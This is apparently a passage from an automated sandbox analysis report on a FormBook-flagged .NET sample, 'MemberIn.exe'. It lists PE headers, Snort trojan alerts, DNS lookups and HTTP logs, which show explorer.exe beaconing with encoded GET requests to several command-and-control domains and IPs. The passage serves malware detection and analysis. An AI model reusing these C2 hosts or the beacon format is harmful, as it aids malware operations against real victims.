add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8b794	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8c000	0x56b4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x92000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8b778	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x897ec	0x89800	False	0.765200639205	data	7.20192556121	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x8c000	0x56b4	0x5800	False	0.566983309659	data	5.15362916959	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x92000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x8c130	0x5068	data
RT_GROUP_ICON	0x91198	0x14	data
RT_VERSION	0x911ac	0x31c	data
RT_MANIFEST	0x914c8	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2019
Assembly Version	1.0.0.0
InternalName	MemberIn.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	Disciples
ProductVersion	1.0.0.0
FileDescription	Disciples
OriginalFilename	MemberIn.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
09/15/21-09:44:41.151329	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49815	80	192.168.2.6	44.227.65.245
09/15/21-09:44:41.151329	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49815	80	192.168.2.6	44.227.65.245
09/15/21-09:44:41.151329	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49815	80	192.168.2.6	44.227.65.245

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 15, 2021 09:44:34.970698118 CEST	49814	80	192.168.2.6	165.73.84.33
Sep 15, 2021 09:44:35.171269894 CEST	80	49814	165.73.84.33	192.168.2.6
Sep 15, 2021 09:44:35.171380997 CEST	49814	80	192.168.2.6	165.73.84.33
Sep 15, 2021 09:44:35.172030926 CEST	49814	80	192.168.2.6	165.73.84.33
Sep 15, 2021 09:44:35.372771025 CEST	80	49814	165.73.84.33	192.168.2.6
Sep 15, 2021 09:44:35.453573942 CEST	80	49814	165.73.84.33	192.168.2.6
Sep 15, 2021 09:44:35.453694105 CEST	80	49814	165.73.84.33	192.168.2.6
Sep 15, 2021 09:44:35.454065084 CEST	49814	80	192.168.2.6	165.73.84.33
Sep 15, 2021 09:44:35.554866076 CEST	49814	80	192.168.2.6	165.73.84.33
Sep 15, 2021 09:44:35.751426935 CEST	80	49814	165.73.84.33	192.168.2.6
Sep 15, 2021 09:44:40.783463001 CEST	49815	80	192.168.2.6	44.227.65.245
Sep 15, 2021 09:44:40.968214035 CEST	80	49815	44.227.65.245	192.168.2.6
Sep 15, 2021 09:44:40.968688965 CEST	49815	80	192.168.2.6	44.227.65.245
Sep 15, 2021 09:44:41.151092052 CEST	80	49815	44.227.65.245	192.168.2.6
Sep 15, 2021 09:44:41.151329041 CEST	49815	80	192.168.2.6	44.227.65.245
Sep 15, 2021 09:44:41.334264040 CEST	80	49815	44.227.65.245	192.168.2.6
Sep 15, 2021 09:44:41.334300995 CEST	80	49815	44.227.65.245	192.168.2.6
Sep 15, 2021 09:44:41.334311962 CEST	80	49815	44.227.65.245	192.168.2.6
Sep 15, 2021 09:44:41.334873915 CEST	49815	80	192.168.2.6	44.227.65.245
Sep 15, 2021 09:44:41.334923029 CEST	49815	80	192.168.2.6	44.227.65.245
Sep 15, 2021 09:44:41.519753933 CEST	80	49815	44.227.65.245	192.168.2.6
Sep 15, 2021 09:44:51.471229076 CEST	49816	80	192.168.2.6	185.134.245.113
Sep 15, 2021 09:44:51.514172077 CEST	80	49816	185.134.245.113	192.168.2.6
Sep 15, 2021 09:44:51.514600039 CEST	49816	80	192.168.2.6	185.134.245.113
Sep 15, 2021 09:44:51.514826059 CEST	49816	80	192.168.2.6	185.134.245.113
Sep 15, 2021 09:44:51.557595015 CEST	80	49816	185.134.245.113	192.168.2.6
Sep 15, 2021 09:44:51.557627916 CEST	80	49816	185.134.245.113	192.168.2.6
Sep 15, 2021 09:44:51.557651043 CEST	80	49816	185.134.245.113	192.168.2.6
Sep 15, 2021 09:44:51.557672024 CEST	80	49816	185.134.245.113	192.168.2.6
Sep 15, 2021 09:44:51.557692051 CEST	80	49816	185.134.245.113	192.168.2.6
Sep 15, 2021 09:44:51.557707071 CEST	80	49816	185.134.245.113	192.168.2.6
Sep 15, 2021 09:44:51.557720900 CEST	49816	80	192.168.2.6	185.134.245.113
Sep 15, 2021 09:44:51.557792902 CEST	49816	80	192.168.2.6	185.134.245.113
Sep 15, 2021 09:44:51.557904959 CEST	49816	80	192.168.2.6	185.134.245.113
Sep 15, 2021 09:44:51.600636005 CEST	80	49816	185.134.245.113	192.168.2.6
Sep 15, 2021 09:44:56.949724913 CEST	49818	80	192.168.2.6	13.250.255.10
Sep 15, 2021 09:44:57.110008955 CEST	80	49818	13.250.255.10	192.168.2.6
Sep 15, 2021 09:44:57.120852947 CEST	49818	80	192.168.2.6	13.250.255.10
Sep 15, 2021 09:44:57.496335030 CEST	49818	80	192.168.2.6	13.250.255.10
Sep 15, 2021 09:44:57.655827999 CEST	80	49818	13.250.255.10	192.168.2.6
Sep 15, 2021 09:44:57.655874014 CEST	80	49818	13.250.255.10	192.168.2.6
Sep 15, 2021 09:44:57.655891895 CEST	80	49818	13.250.255.10	192.168.2.6
Sep 15, 2021 09:44:57.657469034 CEST	49818	80	192.168.2.6	13.250.255.10
Sep 15, 2021 09:44:57.657594919 CEST	49818	80	192.168.2.6	13.250.255.10
Sep 15, 2021 09:44:57.817284107 CEST	80	49818	13.250.255.10	192.168.2.6
Sep 15, 2021 09:45:07.798247099 CEST	49822	80	192.168.2.6	185.215.4.13
Sep 15, 2021 09:45:07.821702957 CEST	80	49822	185.215.4.13	192.168.2.6
Sep 15, 2021 09:45:07.821835995 CEST	49822	80	192.168.2.6	185.215.4.13
Sep 15, 2021 09:45:07.821926117 CEST	49822	80	192.168.2.6	185.215.4.13
Sep 15, 2021 09:45:07.845688105 CEST	80	49822	185.215.4.13	192.168.2.6
Sep 15, 2021 09:45:07.902590990 CEST	80	49822	185.215.4.13	192.168.2.6
Sep 15, 2021 09:45:07.902627945 CEST	80	49822	185.215.4.13	192.168.2.6
Sep 15, 2021 09:45:07.902755022 CEST	49822	80	192.168.2.6	185.215.4.13
Sep 15, 2021 09:45:07.902831078 CEST	49822	80	192.168.2.6	185.215.4.13
Sep 15, 2021 09:45:08.210844994 CEST	49822	80	192.168.2.6	185.215.4.13
Sep 15, 2021 09:45:08.235425949 CEST	80	49822	185.215.4.13	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 15, 2021 09:42:59.659955978 CEST	55074	53	192.168.2.6	8.8.8.8
Sep 15, 2021 09:42:59.689527988 CEST	53	55074	8.8.8.8	192.168.2.6
Sep 15, 2021 09:43:28.862119913 CEST	54513	53	192.168.2.6	8.8.8.8
Sep 15, 2021 09:43:28.896136999 CEST	53	54513	8.8.8.8	192.168.2.6
Sep 15, 2021 09:43:31.360534906 CEST	62044	53	192.168.2.6	8.8.8.8
Sep 15, 2021 09:43:31.403969049 CEST	53	62044	8.8.8.8	192.168.2.6
Sep 15, 2021 09:43:50.682168961 CEST	63791	53	192.168.2.6	8.8.8.8
Sep 15, 2021 09:43:50.716701984 CEST	53	63791	8.8.8.8	192.168.2.6
Sep 15, 2021 09:43:55.214967012 CEST	64267	53	192.168.2.6	8.8.8.8
Sep 15, 2021 09:43:55.240340948 CEST	53	64267	8.8.8.8	192.168.2.6
Sep 15, 2021 09:43:56.156646013 CEST	49448	53	192.168.2.6	8.8.8.8
Sep 15, 2021 09:43:56.185348988 CEST	53	49448	8.8.8.8	192.168.2.6
Sep 15, 2021 09:43:56.318314075 CEST	60342	53	192.168.2.6	8.8.8.8
Sep 15, 2021 09:43:56.354317904 CEST	53	60342	8.8.8.8	192.168.2.6
Sep 15, 2021 09:43:57.143197060 CEST	61346	53	192.168.2.6	8.8.8.8
Sep 15, 2021 09:43:57.173204899 CEST	53	61346	8.8.8.8	192.168.2.6
Sep 15, 2021 09:43:57.634675980 CEST	51774	53	192.168.2.6	8.8.8.8
Sep 15, 2021 09:43:57.660480022 CEST	53	51774	8.8.8.8	192.168.2.6
Sep 15, 2021 09:43:58.436158895 CEST	56023	53	192.168.2.6	8.8.8.8
Sep 15, 2021 09:43:58.490257025 CEST	53	56023	8.8.8.8	192.168.2.6
Sep 15, 2021 09:43:59.844085932 CEST	58384	53	192.168.2.6	8.8.8.8
Sep 15, 2021 09:43:59.871186972 CEST	53	58384	8.8.8.8	192.168.2.6
Sep 15, 2021 09:44:03.038388968 CEST	60261	53	192.168.2.6	8.8.8.8
Sep 15, 2021 09:44:03.068991899 CEST	53	60261	8.8.8.8	192.168.2.6
Sep 15, 2021 09:44:04.006849051 CEST	56061	53	192.168.2.6	8.8.8.8
Sep 15, 2021 09:44:04.033698082 CEST	53	56061	8.8.8.8	192.168.2.6
Sep 15, 2021 09:44:04.953435898 CEST	58336	53	192.168.2.6	8.8.8.8
Sep 15, 2021 09:44:04.983305931 CEST	53	58336	8.8.8.8	192.168.2.6
Sep 15, 2021 09:44:05.492280960 CEST	53781	53	192.168.2.6	8.8.8.8
Sep 15, 2021 09:44:05.522380114 CEST	53	53781	8.8.8.8	192.168.2.6
Sep 15, 2021 09:44:12.379160881 CEST	54064	53	192.168.2.6	8.8.8.8
Sep 15, 2021 09:44:12.408813000 CEST	53	54064	8.8.8.8	192.168.2.6
Sep 15, 2021 09:44:29.086762905 CEST	52811	53	192.168.2.6	8.8.8.8
Sep 15, 2021 09:44:29.116419077 CEST	53	52811	8.8.8.8	192.168.2.6
Sep 15, 2021 09:44:29.396056890 CEST	55299	53	192.168.2.6	8.8.8.8
Sep 15, 2021 09:44:29.734292984 CEST	53	55299	8.8.8.8	192.168.2.6
Sep 15, 2021 09:44:34.750972986 CEST	63745	53	192.168.2.6	8.8.8.8
Sep 15, 2021 09:44:34.963228941 CEST	53	63745	8.8.8.8	192.168.2.6
Sep 15, 2021 09:44:40.585074902 CEST	50055	53	192.168.2.6	8.8.8.8
Sep 15, 2021 09:44:40.782047033 CEST	53	50055	8.8.8.8	192.168.2.6
Sep 15, 2021 09:44:46.366214991 CEST	61374	53	192.168.2.6	8.8.8.8
Sep 15, 2021 09:44:46.415891886 CEST	53	61374	8.8.8.8	192.168.2.6
Sep 15, 2021 09:44:51.423722982 CEST	50339	53	192.168.2.6	8.8.8.8
Sep 15, 2021 09:44:51.470158100 CEST	53	50339	8.8.8.8	192.168.2.6
Sep 15, 2021 09:44:53.846091986 CEST	63307	53	192.168.2.6	8.8.8.8
Sep 15, 2021 09:44:53.888386011 CEST	53	63307	8.8.8.8	192.168.2.6
Sep 15, 2021 09:44:56.576827049 CEST	49694	53	192.168.2.6	8.8.8.8
Sep 15, 2021 09:44:56.943630934 CEST	53	49694	8.8.8.8	192.168.2.6
Sep 15, 2021 09:44:58.960994005 CEST	54982	53	192.168.2.6	8.8.8.8
Sep 15, 2021 09:44:59.005784035 CEST	53	54982	8.8.8.8	192.168.2.6
Sep 15, 2021 09:45:07.703166008 CEST	50010	53	192.168.2.6	8.8.8.8
Sep 15, 2021 09:45:07.797244072 CEST	53	50010	8.8.8.8	192.168.2.6
Sep 15, 2021 09:45:12.916143894 CEST	63718	53	192.168.2.6	8.8.8.8
Sep 15, 2021 09:45:13.098176956 CEST	53	63718	8.8.8.8	192.168.2.6
Sep 15, 2021 09:45:18.792363882 CEST	62116	53	192.168.2.6	8.8.8.8
Sep 15, 2021 09:45:19.136847019 CEST	53	62116	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 15, 2021 09:44:29.396056890 CEST	192.168.2.6	8.8.8.8	0xd932	Standard query (0)	www.hisensor.world	A (IP address)	IN (0x0001)
Sep 15, 2021 09:44:34.750972986 CEST	192.168.2.6	8.8.8.8	0x536c	Standard query (0)	www.ifbrick.com	A (IP address)	IN (0x0001)
Sep 15, 2021 09:44:40.585074902 CEST	192.168.2.6	8.8.8.8	0x1a4f	Standard query (0)	www.integrity.directory	A (IP address)	IN (0x0001)
Sep 15, 2021 09:44:46.366214991 CEST	192.168.2.6	8.8.8.8	0xd21d	Standard query (0)	www.advindustry.com	A (IP address)	IN (0x0001)
Sep 15, 2021 09:44:51.423722982 CEST	192.168.2.6	8.8.8.8	0x3c0b	Standard query (0)	www.nordicbatterybelt.net	A (IP address)	IN (0x0001)
Sep 15, 2021 09:44:56.576827049 CEST	192.168.2.6	8.8.8.8	0x6dff	Standard query (0)	www.starworks.online	A (IP address)	IN (0x0001)
Sep 15, 2021 09:45:07.703166008 CEST	192.168.2.6	8.8.8.8	0x89eb	Standard query (0)	www.sashaignatenko.com	A (IP address)	IN (0x0001)
Sep 15, 2021 09:45:12.916143894 CEST	192.168.2.6	8.8.8.8	0x8303	Standard query (0)	www.zmdhysm.com	A (IP address)	IN (0x0001)
Sep 15, 2021 09:45:18.792363882 CEST	192.168.2.6	8.8.8.8	0xde00	Standard query (0)	www.menramen.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 15, 2021 09:44:29.734292984 CEST	8.8.8.8	192.168.2.6	0xd932	Name error (3)	www.hisensor.world	none	none	A (IP address)	IN (0x0001)
Sep 15, 2021 09:44:34.963228941 CEST	8.8.8.8	192.168.2.6	0x536c	No error (0)	www.ifbrick.com		165.73.84.33	A (IP address)	IN (0x0001)
Sep 15, 2021 09:44:40.782047033 CEST	8.8.8.8	192.168.2.6	0x1a4f	No error (0)	www.integrity.directory		44.227.65.245	A (IP address)	IN (0x0001)
Sep 15, 2021 09:44:40.782047033 CEST	8.8.8.8	192.168.2.6	0x1a4f	No error (0)	www.integrity.directory		44.227.76.166	A (IP address)	IN (0x0001)
Sep 15, 2021 09:44:46.415891886 CEST	8.8.8.8	192.168.2.6	0xd21d	Name error (3)	www.advindustry.com	none	none	A (IP address)	IN (0x0001)
Sep 15, 2021 09:44:51.470158100 CEST	8.8.8.8	192.168.2.6	0x3c0b	No error (0)	www.nordicbatterybelt.net		185.134.245.113	A (IP address)	IN (0x0001)
Sep 15, 2021 09:44:56.943630934 CEST	8.8.8.8	192.168.2.6	0x6dff	No error (0)	www.starworks.online	dns.ladipage.com		CNAME (Canonical name)	IN (0x0001)
Sep 15, 2021 09:44:56.943630934 CEST	8.8.8.8	192.168.2.6	0x6dff	No error (0)	dns.ladipage.com	ladi-dns-ssl-nlb-prod-4-5fac4e17b8b8295e.elb.ap-southeast-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Sep 15, 2021 09:44:56.943630934 CEST	8.8.8.8	192.168.2.6	0x6dff	No error (0)	ladi-dns-ssl-nlb-prod-4-5fac4e17b8b8295e.elb.ap-southeast-1.amazonaws.com		13.250.255.10	A (IP address)	IN (0x0001)
Sep 15, 2021 09:44:56.943630934 CEST	8.8.8.8	192.168.2.6	0x6dff	No error (0)	ladi-dns-ssl-nlb-prod-4-5fac4e17b8b8295e.elb.ap-southeast-1.amazonaws.com		13.250.192.238	A (IP address)	IN (0x0001)
Sep 15, 2021 09:45:07.797244072 CEST	8.8.8.8	192.168.2.6	0x89eb	No error (0)	www.sashaignatenko.com	sashaignatenko.com		CNAME (Canonical name)	IN (0x0001)
Sep 15, 2021 09:45:07.797244072 CEST	8.8.8.8	192.168.2.6	0x89eb	No error (0)	sashaignatenko.com		185.215.4.13	A (IP address)	IN (0x0001)
Sep 15, 2021 09:45:13.098176956 CEST	8.8.8.8	192.168.2.6	0x8303	No error (0)	www.zmdhysm.com		154.64.44.142	A (IP address)	IN (0x0001)
Sep 15, 2021 09:45:19.136847019 CEST	8.8.8.8	192.168.2.6	0xde00	No error (0)	www.menramen.com	menramen.com		CNAME (Canonical name)	IN (0x0001)
Sep 15, 2021 09:45:19.136847019 CEST	8.8.8.8	192.168.2.6	0xde00	No error (0)	menramen.com		180.235.151.100	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.ifbrick.com

www.integrity.directory

www.nordicbatterybelt.net

www.starworks.online

www.sashaignatenko.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49814	165.73.84.33	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2021 09:44:35.172030926 CEST	5900	OUT	GET /n58i/?fD=F+G31dedRh6HLTd+ecIv/qGaPc+OF0rVpdWlg5lJjBXzRtzoveZeEYo5TUAR7GVYQJUOwMAABw==&7nVT9d=P6AhC8Yh4LuLMhK0 HTTP/1.1 Host: www.ifbrick.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 15, 2021 09:44:35.453573942 CEST	5900	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 15 Sep 2021 07:44:35 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 315 Connection: close Vary: Accept-Encoding X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49815	44.227.65.245	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2021 09:44:41.151329041 CEST	5901	OUT	GET /n58i/?7nVT9d=P6AhC8Yh4LuLMhK0&fD=unnhyE6s8wGaSGOfJAqqywl5AWsKat8KABC8TJyOz0JlXUzqDPtAwNp8gBEuIS9Csn5pfDFizQ== HTTP/1.1 Host: www.integrity.directory Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 15, 2021 09:44:41.334300995 CEST	5902	IN	HTTP/1.1 307 Temporary Redirect Server: openresty Date: Wed, 15 Sep 2021 07:44:41 GMT Content-Type: text/html; charset=utf-8 Content-Length: 168 Connection: close Location: http://integrity.directory X-Frame-Options: sameorigin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49816	185.134.245.113	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2021 09:44:51.514826059 CEST	5904	OUT	GET /n58i/?7nVT9d=P6AhC8Yh4LuLMhK0&fD=M2+dNbjF68Ecx6/kG0IjEvERphPYwrhl5ASQUZVNwgXuLMQcMfVPa3ABQDdZS66N8pSyWuXUWw== HTTP/1.1 Host: www.nordicbatterybelt.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 15, 2021 09:44:51.557627916 CEST	5905	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Sep 2021 07:44:51 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Expires: Wed, 15 Sep 2021 08:44:51 GMT Cache-Control: max-age=3600 Cache-Control: public Data Raw: 66 38 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 72 65 64 69 72 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 31 30 3b 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 6f 6d 65 6e 65 73 68 6f 70 2e 6e 6f 2f 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 6f 6d 65 6e 65 73 68 6f 70 2e 6e 6f 2f 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 72 65 6e 64 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 6f 6d 65 6e 65 73 68 6f 70 2e 6e 6f 2f 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 6f 6d 65 6e 65 73 68 6f 70 2e 6e 6f 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 6e 6f 72 64 69 63 62 61 74 74 65 72 79 62 65 6c 74 2e 6e 65 74 20 69 73 20 70 61 72 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 0a 2a 20 7b 6d 61 72 67 69 6e 3a 20 30 3b 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 0a 62 6f 64 79 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 63 63 63 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 74 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 68 31 20 7b 0a 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 61 75 74 6f 20 32 30 70 78 20 31 30 70 78 3b 0a 63 6f 6c 6f 72 3a 20 23 33 34 39 38 64 62 3b 0a 7d 0a 0a 70 20 7b 0a 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 6d 69 6e 2d 77 69 64 74 68 3a 20 32 30 30 70 78 3b 0a 6d 61 72 67 69 6e 3a 20 61 75 74 6f 20 33 30 70 78 20 31 30 70 78 20 33 30 70 78 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 6d 69 6e 2d 68 65 69 67 68 74 3a 20 32 30 30 70 78 3b 0a 6d 61 78 2d 77 69 64 74 68 3a 20 38 30 30 70 78 3b 0a 6d 69 6e 2d 77 69 64 74 68 3a 20 34 35 30 70 78 3b 0a 6d 61 72 67 69 6e 3a 20 31 35 25 20 61 75 74 6f 20 30 70 78 20 61 75 74 6f 3b 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 46 46 46 46 46 3b 0a 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 